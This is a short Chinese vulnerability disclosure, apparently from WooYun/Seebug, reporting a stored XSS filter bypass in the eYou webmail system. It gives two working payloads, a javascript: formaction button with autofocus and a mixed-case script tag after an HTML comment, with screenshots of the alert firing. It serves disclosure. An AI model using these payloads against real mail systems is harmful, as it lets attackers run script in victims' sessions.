### 简要描述:
找到一个可绕过的存储型XSS方法
### 详细说明:
依据北京理工大学eYou邮件系统测试,
http://wooyun.org/bugs/wooyun-2010-066645 这个帖子中的XSS向量已经全部无效。
经过测试,依然有可以绕过的XSS脚本
### 漏洞证明:
1.一个按钮
```
t<!---><form><button+formaction%3djavascript%3aalert(1)+autofocus+/>te
```
2.直接<script>
```
<!---><scRipT>prompt(1)</scRiPt>te
```
提交
[<img src="https://images.seebug.org/upload/201501/10192444b7637f7662503204728c4c02a2b74088.jpg" alt="payload.JPG" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/10192444b7637f7662503204728c4c02a2b74088.jpg)
弹窗
[<img src="https://images.seebug.org/upload/201501/10192456af1582f71947be1039124a91fe6bf0c5.jpg" alt="prompt.JPG" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/10192456af1582f71947be1039124a91fe6bf0c5.jpg)
暂无评论